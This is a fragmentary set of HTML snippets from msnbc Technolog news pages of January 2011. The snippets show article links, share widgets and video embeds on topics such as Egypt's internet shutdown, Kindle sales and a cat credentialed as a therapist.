<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942012-did-spam-text-kill-a-russian-suicide-bomber" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>The vast majority of urban Egyptians, 78 percent, feel that it is, according to a <a href="http://news.bbc.co.uk/2/hi/8548190.stm">BBC World Service survey</a>
...[SNIP]...
<p class="p1">"It's freedom of expression that is a long-standing core right," Neil Hicks, international policy adviser for <a href="http://www.humanrightsfirst.org/">Human Rights First</a>
...[SNIP]...
<p class="p1">Outrage around the world centers on this issue. Cynthia Wong, international project director for the <a href="http://www.cdt.org/">Center for Democracy & Technology</a>
...[SNIP]...
<p class="p1">But when <a href="http://gizmodo.com/5745478/is-internet-access-a-human-right">the same question was posed by our friend Joel Johnson on the tech blog Gizmodo</a>
...[SNIP]...
<em>Catch up with Wilson on Twitter at <a href="http://www.twitter.com/wjrothman">@wjrothman</a>, or join our conversation at the <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5941854-is-internet-access-a-human-right" data-Text="Is Internet access a human right?">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5941854-is-internet-access-a-human-right" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>"Under Egyptian legislation the authorities have the right to issue such an order and we are obliged to comply with it," Vodafone, one of the largest cell phone carriers, in Egypt, <a href="http://www.vodafone.com/content/index/press.html" target="_blank" class="vt-p">said in a statement</a>
...[SNIP]...
means because "what the government does is very effective for stopping the most basic users, meaning average users, the folks who probably aren't Twitter users," says Philip N. Howard, director of the <a href="http://www.pitpi.org/" target="_blank" class="vt-p">Project on Information Technology and Political Islam</a>
...[SNIP]...
<strong><a class="vt-p" target="_blank" href="http://twitter.com/malexjohnson">Follow M. Alex Johnson on Twitter</a>
...[SNIP]...
<strong><a class="vt-p" target="_blank" href="http://www.facebook.com/pages/Alex-Johnson-msnbccom/136854296350964">Follow M. Alex Johnson on Facebook</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5941852-this-is-about-social-networks-that-are-beyond-the-reach-of-mubarak" data-Text="'This is about social networks that are beyond the reach of Mubarak'">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5941852-this-is-about-social-networks-that-are-beyond-the-reach-of-mubarak" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5941352" data-contentId="5941352" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="athima-chansanchai/5941352.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/athima-chansanchai/5941352.jpg" width="600" height="400" alt="" /><p class="photo_credit">
...[SNIP]...
<div id="vine-inlinePhoto__5941346" data-contentId="5941346" class="inlinePhoto photo_portrait photo_align_right user_inline_photo" style="width:280px;"><img id="athima-chansanchai/5941346.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/athima-chansanchai/5941346.jpg" width="280" height="420" alt="" /><div class="photo_credit_container">
...[SNIP]...
</a>, hoping the world won't see more photos like these (from <a href="http://www.flickr.com/photos/aljazeeraenglish/" target="_blank">Al Jazeera's Flickr photostream</a>
...[SNIP]...
<p>Searching for <a href="http://www.youtube.com/results?search_query=mubarak+protest&aq=f" target="_blank">"Mubarak protest" on YouTube will yield hundreds of videos</a>, several taken in the last few days by news crews embedded in Egypt, as will "<a href="http://www.youtube.com/results?search_query=egypt+protest+2011&aq=0sx" target="_blank">Egypt Protest 2011</a>
...[SNIP]...
<p>This video comes via a collection put together by <a href="http://mashable.com/2011/01/27/youtube-flickr-show-escalating-violence-in-egyptian-protests/" target="_blank">Mashable</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/JORCXkSKvf0&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<p>And while attempts have been made to stifle Twitter and Facebook feeds, undeniable proof of the protests continue to come through, like this video, which I found from a Twitter link that led to a <a href="http://www.facebook.com/anarchismnews/posts/180233175348223" target="_blank">Facebook page</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/xnQgaMOZLRc&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/q_AF1t1KeZ8&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see" data-Text="What the Egyptian government doesn't want you to see">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5941467" data-contentId="5941467" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5941467.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5941467.jpg" width="600" height="450" alt="" />
...[SNIP]...
startling efficiency with which a government can isolate a country that has few telecom providers. The action is also far and above any previous any Internet shutdown connected to political unrest, as <a href="http://www.renesys.com/blog/2011/01/egypt-leaves-the-internet.shtml">Jame's Cowie points out in the Renesys blog</a>
...[SNIP]...
<em><a href="http://www.renesys.com/blog/2011/01/egypt-leaves-the-internet.shtml">Renesys</a> via <a href="http://www.businessinsider.com/sai">Business Insider</a>
...[SNIP]...
<p>Join the coversation on our <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5941456-infograph-egypt-drops-off-the-internet" data-Text="Infograph: Egypt drops off the Internet">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5941456-infograph-egypt-drops-off-the-internet" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5941146" data-contentId="5941146" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="athima-chansanchai/5941146.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/athima-chansanchai/5941146.jpg" width="280" height="93" alt="" />
...[SNIP]...
<p>"I had the Facebook for one purpose — to keep in contact with my family," Fteja told <a href="http://www.nydailynews.com/ny_local/2011/01/26/2011-01-26_man_sues_facebook_claiming_socialnetworking_site_shut_down_his_account_for_no_re.html" target="_blank">The Daily News</a>
...[SNIP]...
<p>There are a lot of mines to step on that could result in Facebook shutting down someone's account, according to its <a href="http://www.facebook.com/terms.php" target="_blank">terms of service</a>
...[SNIP]...
<p>"I know one thing - I didn't do anything," he told <a href="http://www.nypost.com/f/print/news/local/staten_island/si_man_hits_facebook_with_suit_rMmqxdBwUg9UJpHI8WIDIK" target="_blank">The New York Post</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5940974-facebook-deprived-man-sues-for-500k" data-Text="Facebook-deprived man sues for $500K">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5940974-facebook-deprived-man-sues-for-500k" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5940889" data-contentId="5940889" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="athima-chansanchai/5940889.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/athima-chansanchai/5940889.jpg" width="280" height="280" alt="" />
...[SNIP]...
</a> we knew it'd only be a matter of time before we heard the announcement that Kindle books outsell paperback books. And now, about a month after that Kindle announcement, <a target="_blank" href="http://phx.corporate-ir.net/phoenix.zhtml?c=176060&p=irol-newsArticle&ID=1521090&highlight=">it's here</a>
...[SNIP]...
<p>Since the beginning of the year, for every 100 paperback books Amazon has sold, the Company has sold 115 Kindle books. <a target="_blank" href="http://techcrunch.com/2010/07/19/kindle-sales/">In July, Kindle books surpassed hardcovers, selling 143 for every 100.</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5940731-kindle-books-now-outsell-paperbacks" data-Text="Kindle books now outsell paperbacks">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5940731-kindle-books-now-outsell-paperbacks" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5940823" data-contentId="5940823" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="helenaspopkin/5940823.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5940823.jpg" width="280" height="157" alt="" /><p class="photo_credit">
...[SNIP]...
</a> — but as of yesterday, the Egyptian government pretty much took the entire country offline. <a href="http://www.renesys.com/blog/2011/01/egypt-leaves-the-internet.shtml">Here's what that looks like</a>
...[SNIP]...
<p>Meanwhile, the <a href="http://www.wired.com/threatlevel/2011/01/fbi-anonymous/">U.S. government knocked down dozens of doors </a>
...[SNIP]...
<p>It's now OK for photographers to take pictures outside public places and federal buildings — <a href="http://www.crunchgear.com/2011/01/27/photographers-youre-now-officially-free-to-shoot-in-public-places-and-outside-federal-buildings/">so there's, that</a>
...[SNIP]...
<p>Some dude on Staten Island is <a href="http://www.nypost.com/p/news/local/manhattan/antisocial_network_WIiiaZ4tHPBHHlXx4GuG5I">suing Facebook for $500,000 </a>
...[SNIP]...
<p>The white iPhone of legend made another short appearance — <a href="http://www.mobilecrunch.com/2011/01/27/the-elusive-white-iphone-appears-on-the-german-apple-website/">this time on the German Apple website </a>
...[SNIP]...
<p>Yeah, don't expect a lot of AT&T iPhone subscribers to jump ship when Verizon's version rolls around — <a href="http://digitaldaily.allthingsd.com/20110128/90-percent-of-att-iphone-subs-still-under-contract/?mod=twitter&utm_source=twitterfeed&utm_medium=twitter">90 percent of them are under contract</a>
...[SNIP]...
<p>Virgin is axing its <a href="http://consumerist.com/2011/01/virgin-mobile-adding-5gb-cap-and-throttle-21511.html">unlimited mobile broadband plan</a>
...[SNIP]...
<p>Amazon now sells <a href="http://techcrunch.com/2011/01/27/kindle-books-overtake-paperback-books-to-become-amazons-most-popular-format/">more Kindle books than paperbacks</a>
...[SNIP]...
<p>Hey! It's an online <a href="http://www.boingboing.net/2011/01/28/online-science-ficti.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+boingboing%2FiBag+%28Boing+Boing%29">Sci Fi writing website from Star Ship Sofa</a>
...[SNIP]...
<span id="ppt19818077">"Man vs. Wild's" Bear Grylls vs. "Survivorman's" Les Stroud in an<a href="http://www.urlesque.com/2011/01/27/bear-grylls-vs-les-stroud/"> Internet fight to the death! </a>
...[SNIP]...
</em><a href="http://twitter.com/helenaspopkin"><i>
...[SNIP]...
</em><a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5940742-pre-caffeine-tech-man-vs-the-internet" data-Text="Pre-caffeine tech: Man vs. the Internet!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5940742-pre-caffeine-tech-man-vs-the-internet" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>Computer scientist <a target="_blank" href="http://blog.stephenwolfram.com/2011/01/jeopardy-ibm-and-wolframalpha/">Stephen Wolfram</a>, the brains behind <a target="_blank" href="http://www.wolframalpha.com/">WolframAlpha</a>, tested how often the correct answers to "Jeopardy" questions appear in the title or text snippets of the results page on <a target="_blank" href="http://www.google.com/">Google</a>, <a target="_blank" href="http://www.bing.com/">Bing</a>
...[SNIP]...
wer on its result page 69 percent of the time. Ask.com's page had the correct answer 68 percent of the time. Bing registered a 63 percent success rate, and Yandex came in at 62 percent. <a target="_blank" href="http://blekko.com/">Blekko</a> (58 percent) and <a target="_blank" href="http://en.wikipedia.org/wiki/Main_Page">Wikipedia</a>
...[SNIP]...
<p>That's where the <a target="_blank" href="http://www-03.ibm.com/innovation/us/watson/">IBM Watson</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/12rNbGf2Wwo&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
e is great for answering questions from unstructured data. This has potential real-world applications such as mining medical documents or patents, and doing discovery in litigation, he notes in a <a target="_blank" href="http://blog.stephenwolfram.com/2011/01/jeopardy-ibm-and-wolframalpha/">blog post</a>
...[SNIP]...
<hr width="100%" size="2" align="center" />
<a target="_blank" href="http://www.byjohnroach.com/"><i>
...[SNIP]...
</i><a target="_blank" href="http://www.facebook.com/cosmiclog"><i>
...[SNIP]...
</i><a href="http://twitter.com/b0yle"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://cosmiclog.msnbc.redacted/_news/2011/01/27/5935463-search-engines-could-play-jeopardy?chromedomain=technolog" data-Text="Search engines could play 'Jeopardy'">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://cosmiclog.msnbc.redacted/_news/2011/01/27/5935463-search-engines-could-play-jeopardy?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5936454" data-contentId="5936454" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5936454.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5936454.jpg" width="600" height="335" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Weary of "therapist-shopping clients" crowing about the many credentials of cut-rate counselors, and alarmed at how easy it is to obtain such credentials over the Internet, Dr. Eichel launched the "<a href="http://www.dreichel.com/dr_zoe.htm#Zoe follow-up">Cat Credentialing Project</a>
...[SNIP]...
<div id="vine-inlinePhoto__5936378" data-contentId="5936378" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="helenaspopkin/5936378.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5936378.jpg" width="280" height="183" alt="" /><div class="photo_credit_container">
...[SNIP]...
<p>While Oreo may be the very first in her family to obtain a diploma, she's not alone in her species. Fraudulent diplomas among the house pet set are so popular, <a href="http://en.wikipedia.org/wiki/List_of_animals_with_fraudulent_diplomas">there’s even a Wikipedia page that lists the honorees</a>
...[SNIP]...
<p>Learn more about the "Cat Credentialing Project" and how to find a qualified hypnotherapist <a href="http://www.dreichel.com/dr_zoe.htm#Zoe follow-up">on Dr. Eichel's website</a>
...[SNIP]...
<em><a href="http://gizmodo.com/5745108/how-a-cat-named-zoe-earned-several-advanced-degrees-and-became-a-psychotherapist">via Gizmodo</a>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Get your fill of her blather on <a href="http://www.facebook.com/home.php#/profile.php?id=1151660271">Facebook</a> and <a href="http://twitter.com/HelenASPopkin">Twitter</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink" data-Text="Online degrees qualify cat to be your shrink">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<br />Twitter has been blocked in Egypt, but news about demonstrations, arrests and police retaliation are still being circulated on the Twitter hashtags <a href="http://twitter.com/#!/search?q=%23Egypt ">#Egypt</a>
...[SNIP]...
<p><a href="http://english.aljazeera.net/news/middleeast/2011/01/201112523026521335.html">Al Jazeera’s staff </a>has compiled tweets on the protests. <a href="http://english.aljazeera.net/news/middleeast/2011/01/201112523026521335.html"></a>
...[SNIP]...
<br />Protesters continue to upload video, like this one of a man standing in front of a water-cannon truck, dubbing it, “<a href="http://www.youtube.com/watch?v=YtTUsqra-MU ">Egypt’s Tiananmen Square moment</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/YtTUsqra-MU&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<p>This <a href="http://www.youtube.com/">YouTube</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/Jjd6CGckke0&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<br />The English edition of the independent <a href="http://www.almasryalyoum.com/en/subchannel/Top%20stories">Egyptian newspaper Al-Masry Al-Youm</a>
...[SNIP]...
<p>The <a href="http://www.guardian.co.uk/world/blog/2011/jan/27/egypt-protests">Guardian newspaper is live blogging </a>
...[SNIP]...
<p>Global Voices, an international community of bloggers, translates local social media into English and has a page dedicated to <a href="http://globalvoicesonline.org/specialcoverage/egypt-protests-2011/ ">Egypt Protests 2011.</a>
...[SNIP]...
<br /><a href="http://english.aljazeera.net/">Al Jazeera</a>
...[SNIP]...
<p>The <a href="http://thelede.blogs.nytimes.com/">New York Times’ Lede blog</a>
...[SNIP]...
<p>The Council on Foreign Relations has coverage of the foreign policy implications with one of the Middle East experts, <a href="http://blogs.cfr.org/cook/">Steven Cook, blogging from Cairo</a>
...[SNIP]...
<p><a href="http://blogs.cfr.org/cook/"></a>Foreign Policy also has an interesting analysis on the million-dollar question: <a href="http://lynch.foreignpolicy.com/posts/2011/01/26/will_the_arab_revolutions_spread">“Will the Arab revolutions spread?”</a>
...[SNIP]...
<p><a href="http://www.economist.com/node/18013760 ">The Economist</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://worldblog.msnbc.redacted/_news/2011/01/27/5936053-watching-egypts-protests?chromedomain=technolog" data-Text="Watching Egypt's protests">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://worldblog.msnbc.redacted/_news/2011/01/27/5936053-watching-egypts-protests?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
.33 million iPads. According to Ross Rubin at NPD, more than half were likely sold in the U.S. Let's say it's 4 million, for the sake of easy math. In that same quarter, AT&T announced that it had <a href="http://www.att.com/gen/press-room?pid=18952&cdvn=news&newsarticleid=31519&mapcode=financial">activated 442,000 3G iPads</a>
...[SNIP]...
<em>Catch up with Wilson on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>, or join the conversation on our <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5935983-dont-worry-wi-fi-only-tablets-are-coming" data-Text="Don't worry, Wi-Fi-only tablets are coming">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5935983-dont-worry-wi-fi-only-tablets-are-coming" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5935650" data-contentId="5935650" class="inlinePhoto photo_portrait photo_align_right user_inline_photo" style="width:264px;"><img id="helenaspopkin/5935650.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5935650.jpg" width="264" height="324" alt="" />
...[SNIP]...
<p>"Is anybody else getting random status updates from this person?" reads the first post in a Facebook Security discussion titled<a href="http://www.facebook.com/topic.php?uid=31987371885&topic=14769"> "Roy Castillo (Roy Castillo)"</a>
...[SNIP]...
<p>Then on Thursday, like Keyser Söze, he was gone, leaving little more than dozens of unanswered user questions, a <a href="http://www.facebook.com/topic.php?uid=31987371885&topic=14769#!/pages/Roy-Castillo-WTF/191704690855344">Roy Castillo WTF Fan Page </a>and a <a href="http://twitter.com/#!/search/%23roycastillo">hilarious Twitter thread</a>
...[SNIP]...
<em>Helen A.S. Popkin writes about Facebook ... a lot. Follow her on <a href="http://twitter.com/helenaspopkin">Twitter</a> and/or <a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128">Facebook</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5935542-mysterious-roy-castillo-haunts-facebook" data-Text="Mysterious 'Roy Castillo' haunts Facebook">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5935542-mysterious-roy-castillo-haunts-facebook" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
</em><a target="_blank" href="http://bit.ly/caLhBE"><em>
...[SNIP]...
</em><a target="_blank" href="http://twitter.com/WindaBenedetti"><em>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://ingame.msnbc.redacted/_news/2011/01/27/5935136-android-getting-games-from-sony?chromedomain=technolog" data-Text="Android getting games from Sony">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://ingame.msnbc.redacted/_news/2011/01/27/5935136-android-getting-games-from-sony?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>That's what Verizon is apparently offering, according to an e-mail shared by <a href="http://www.macrumors.com/2011/01/26/verizon-iphone-pre-orders-to-start-at-3am-et-on-february-3rd-offering-atandt-trade-ins/">MacRumors.com</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5934826-verizon-offering-att-iphone-trade-in-program" data-Text="Verizon offering AT&T iPhone trade-in program?">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5934826-verizon-offering-att-iphone-trade-in-program" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5934467" data-contentId="5934467" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="helenaspopkin/5934467.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5934467.jpg" width="280" height="210" alt="" /><div class="photo_credit_container">
...[SNIP]...
</span> <a href="http://www.macrumors.com/2011/01/26/verizon-iphone-pre-orders-to-start-at-3am-et-on-february-3rd-offering-atandt-trade-ins/"><span>
...[SNIP]...
</span> saga, controversy, and hopefully, <a href="http://www.youtube.com/watch?v=4L-ueFdKzjc&feature=player_embedded">Julian <span>
...[SNIP]...
<p>Hooray! <a href="http://www.urlesque.com/2011/01/27/old-spice-guy-isaiah-mustafa-back/">The Old Spice dude is back!</a>
...[SNIP]...
<p>Oh noes! An Amazon security flaw may make <a href="http://feeds.gawker.com/~r/lifehacker/full/~3/VbASl0_jzW8/amazon-security-flaw-may-make-your-old-password-easy-to-crack">your old Amazon password easy to crack</a>
...[SNIP]...
</span> ... I wonder what ever happened to all those nerds in that one iconic Microsoft staff photo from 1978. <a href="http://www.businessinsider.com/microsoft-1978-photo-2011-1#">Maybe this link knows something. </a>
...[SNIP]...
